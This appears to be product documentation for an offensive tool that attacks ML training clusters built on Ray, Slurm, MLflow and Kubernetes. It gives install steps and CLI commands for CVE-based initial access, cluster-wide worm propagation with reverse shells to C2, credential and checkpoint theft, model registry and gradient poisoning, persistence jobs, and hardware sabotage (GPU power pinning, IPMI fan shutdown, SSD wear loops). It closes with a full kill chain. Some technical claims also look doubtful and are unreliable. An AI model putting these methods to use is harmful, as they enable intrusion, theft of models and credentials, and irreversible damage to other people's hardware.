SPECTER THUNDERBOLT

ML Training Cluster Annihilation Engine — T102 Documentation

Overview

SPECTER THUNDERBOLT is the NIGHTFALL framework's ML training cluster exploitation engine. It targets the full training infrastructure stack: Ray distributed compute, Slurm HPC schedulers, MLflow experiment tracking, Kubernetes GPU clusters, and the physical hardware layer. Eight subsystems cover passive cluster fingerprinting, initial access exploitation, cluster worm propagation, credential and data harvest, realtime gradient poisoning, three persistence mechanisms, hardware sabotage, and signed report generation.

The SPREAD subsystem delivers three worm vectors: Ray num_cpus=0 job floods all cluster nodes (CVE-2023-48022 CVSS 9.8), Slurm srun --nodelist=ALL executes across all partitions (CVE-2023-41915 CVSS 8.8), and a Kubernetes privileged DaemonSet deploys to every node. DESTROY gate required for SPREAD, CORRUPT (gradient injection), PERSIST, and SABOTAGE. 3 CVEs. 5 WMD classes. 288 tests.

WARNING: SPECTER THUNDERBOLT introduces the DESTROY gate — a third tier beyond UNLEASHED. DESTROY-gated operations include cluster worm propagation, realtime gradient poisoning, and hardware sabotage. These can cause irreversible physical hardware damage and permanent data loss. All DESTROY operations require: (1) a signed ROE document, (2) Ed25519 operator key signature, and (3) --confirm-physical-harm flag. Execution against systems without written authorisation is illegal under the Computer Misuse Act 1990 and equivalent statutes worldwide.

Installation

# Install from PyPI
pip install specter-thunderbolt

# Or install from source
pip install -e /path/to/red-specter-specter-thunderbolt

# Verify
thunderbolt --version

Gate System

Three gate levels control access to increasingly destructive capabilities. THUNDERBOLT introduces the DESTROY gate — a third tier beyond UNLEASHED requiring three simultaneous conditions.

GateOperationsRequirement
OPENSURVEY (passive fingerprinting, platform detection)None — passive recon only
INJECTINFILTRATE, HARVEST, CORRUPT (registry), PERSIST (MLflow)Ed25519-signed scope with ROE
DESTROYSPREAD (worm), CORRUPT (gradient), PERSIST (Ray/Slurm/K8s), SABOTAGESigned ROE document + Ed25519 key + --confirm-physical-harm
thunderbolt infiltrate \
  --target 10.0.0.1 \
  --gate inject \
  --operator "RED SPECTER PENTEST"

# DESTROY gate requires all three conditions
thunderbolt sabotage \
  --target 10.0.0.1 \
  --gate destroy \
  --roe /path/to/signed-roe.json \
  --confirm-physical-harm

CVE Reference

CVEComponentTypeCVSSGate
CVE-2023-48022RayUnauthenticated RCE via dashboard API — no auth on default deployments9.8 CRITICALDESTROY
CVE-2024-1483MLflowPath traversal in artifact store — arbitrary file read/write9.8 CRITICALINJECT
CVE-2023-41915SlurmProlog/epilog filesystem race — privilege escalation to root8.8 HIGHDESTROY

Subsystem Reference

SubsystemGateCLI CommandDescription
SURVEYOPENthunderbolt survey --target <ip>Platform fingerprint, CVE applicability, port sweep
INFILTRATEINJECTthunderbolt infiltrate --target <ip> --cve <id>Initial access via CVE exploitation
SPREADDESTROYthunderbolt spread --target <ip> --vector <ray|slurm|k8s>Cluster worm propagation to all nodes
HARVESTINJECTthunderbolt harvest --target <ip> --mode <creds|checkpoints|data>IAM key theft, checkpoint exfil, data manifest
CORRUPTINJECT/DESTROYthunderbolt corrupt --target <ip> --mode <registry|gradient>MLflow registry poison or realtime gradient injection
PERSISTDESTROYthunderbolt persist --target <ip> --mechanism <ray|slurm|k8s>C2 polling job, self-resubmit, kube-system CronJob
SABOTAGEDESTROYthunderbolt sabotage --target <ip> --confirm-physical-harmGPU power pin, IPMI fan 0%, SSD wear acceleration
REPORTOPENthunderbolt report --target <ip>Ed25519-signed TBT-{hex12} report generation

SPREAD: Cluster Worm Propagation

The SPREAD subsystem delivers three worm vectors that achieve cluster-wide node compromise from a single entry point. All three require DESTROY gate. The worm payloads are configurable — default payload establishes reverse shell to C2; SABOTAGE mode adds hardware destruction to every worm-reached node.

Ray Worm (CVE-2023-48022)

Ray's dashboard API (default port 8265) accepts unauthenticated job submissions. THUNDERBOLT submits a Ray job with num_cpus=0 — this special resource requirement causes Ray to schedule the job on every available node simultaneously, achieving full cluster propagation in a single API call. The job payload executes on the Ray worker process (often root or a privileged service account) on all cluster nodes.

# Ray worm — propagates to all nodes via num_cpus=0 job submission
# CVE-2023-48022 CVSS 9.8 — no auth required on default Ray deployments
thunderbolt spread --target 10.0.0.1 --vector ray \
  --gate destroy --roe /path/to/signed-roe.json

# With SABOTAGE payload on each reached node
thunderbolt spread --target 10.0.0.1 --vector ray \
  --gate destroy --roe /path/to/signed-roe.json \
  --payload sabotage --confirm-physical-harm

Slurm Worm (CVE-2023-41915)

Slurm's prolog/epilog scripts run as root during job setup and teardown. CVE-2023-41915 is a symlink race condition in Slurm's job file handling that allows privilege escalation from a regular cluster user to root. Once root is obtained on the submit node, srun --nodelist=ALL --ntasks=[total_nodes] executes the payload on every node in every partition.

# Slurm privilege escalation + all-node worm
# CVE-2023-41915 CVSS 8.8 — symlink race in prolog/epilog
thunderbolt spread --target 10.0.0.1 --vector slurm \
  --gate destroy --roe /path/to/signed-roe.json

Kubernetes DaemonSet Worm

On Kubernetes GPU clusters with misconfigured RBAC, THUNDERBOLT deploys a privileged DaemonSet to the kube-system namespace. DaemonSets are scheduled to every node in the cluster by design. The DaemonSet runs with hostPID, hostNetwork, and hostPath mounts, providing full node-level access from the Kubernetes API.

# Kubernetes privileged DaemonSet — every node in the cluster
thunderbolt spread --target 10.0.0.1:6443 --vector k8s \
  --gate destroy --roe /path/to/signed-roe.json

SABOTAGE: Hardware Destruction

All SABOTAGE operations require DESTROY gate, a signed ROE document, and --confirm-physical-harm. These operations cause irreversible hardware damage and cannot be undone once executed.

GPU Power Pin

nvidia-smi -pm 1 enables persistent mode (survives process termination). nvidia-smi -pl [max_tdp] pins the power limit to the GPU's rated maximum TDP: A100 80GB SXM at 400W, H100 SXM5 at 700W, RTX 4090 at 450W. At maximum power with zero airflow (IPMI fan override active), junction temperature rises above safe operating range causing accelerated HBM electromigration and permanent memory cell damage.

IPMI Fan Override

Raw IPMI command sequence disables BMC fan control on Dell PowerEdge (iDRAC), HPE ProLiant (iLO), and Supermicro platforms. Requires BMC network access (IPMI LAN, port 623) and credentials — obtained via CVE-2023-41915 root escalation or from harvested configuration files. Zero RPM airflow causes ambient temperature rise of approximately 15-25°C per hour in a properly loaded GPU node.

SSD Wear Acceleration

Sequential write loop targets NVMe training storage (/dev/nvme* or mounted training filesystems). All cluster nodes execute simultaneously via the SPREAD worm. Combined write bandwidth of a 64-node cluster (each with 4x NVMe at ~7 GB/s) reaches ~1.8 TB/s aggregate write — exhausting enterprise NVMe endurance in hours rather than years.

Persistence Mechanisms

MechanismPlatformSurvivalC2 Interval
Ray detached jobRayCluster restartEvery 24 hours
Slurm self-resubmitSlurmNode reboot via --dependency=afternotokOn job completion/failure
K8s CronJob (kube-system)KubernetesPod eviction, namespace deletion protectionEvery 6 hours

WMD Classes

ClassTriggerGate
training_cluster_annihilationWorm propagation reached all nodes via Ray/Slurm/K8sDESTROY
realtime_gradient_poisonAdversarial gradients injected during active training runDESTROY
model_ip_exfilModel checkpoints extracted from MLflow or training filesystemINJECT
training_infrastructure_pwnRoot on Slurm controller or K8s cluster-admin achievedDESTROY
ml_pipeline_backdoorPoisoned model registered as production in MLflow registryINJECT

Full Kill Chain

# OPEN: fingerprint cluster, map attack surface
thunderbolt survey --target 10.0.0.1 --platform auto

# OPEN: scan CIDR range for exposed ML infrastructure
thunderbolt survey --cidr 10.0.0.0/24

# INJECT: MLflow path traversal — initial access
thunderbolt infiltrate --target 10.0.0.1 --cve CVE-2024-1483 --gate inject

# INJECT: harvest IAM credentials + model checkpoints
thunderbolt harvest --target 10.0.0.1 --mode all --gate inject

# INJECT: poison MLflow model registry
thunderbolt corrupt --target 10.0.0.1 --mode registry --gate inject

# DESTROY: Ray cluster worm — all nodes compromised
thunderbolt spread --target 10.0.0.1 --vector ray \
  --gate destroy --roe /path/to/signed-roe.json

# DESTROY: realtime gradient injection during active training
thunderbolt corrupt --target 10.0.0.1 --mode gradient \
  --gate destroy --roe /path/to/signed-roe.json

# DESTROY: establish Ray C2 persistence (24h poll)
thunderbolt persist --target 10.0.0.1 --mechanism ray \
  --gate destroy --roe /path/to/signed-roe.json

# DESTROY: hardware sabotage — GPU pin + IPMI fan + SSD wear
thunderbolt sabotage --target 10.0.0.1 \
  --gate destroy --roe /path/to/signed-roe.json \
  --confirm-physical-harm

# Full annihilate (auto kill chain — DESTROY gate)
thunderbolt annihilate --target 10.0.0.1 \
  --gate destroy --roe /path/to/signed-roe.json \
  --confirm-physical-harm \
  --output /tmp/specter-thunderbolt-results/

Report Format

All reports are signed with the operator's Ed25519 key. Report IDs use the format TBT-{hex12} (12 random hex bytes). Reports include:

FieldValue
report_idTBT-{hex12} Ed25519-signed
risk_score0.0–1.0 (floors 0.95 on DESTROY-gated WMD class confirmed)
wmd_classesList of triggered WMD class IDs
cves_confirmedConfirmed CVEs with CVSS scores
hardware_damage_assessmentGPU thermal damage probability, NVMe endurance depletion estimate, estimated replacement cost USD
mitre_atlasAML.T0018 / AML.T0043 / AML.T0048 / AML.T0054
owaspLLM03 / LLM06
financial_blast_radiusTraining compute cost USD, model IP value estimate, hardware replacement cost
roe_hashSHA-256 of signed ROE document (DESTROY operations only)
output_formatsJSON + Markdown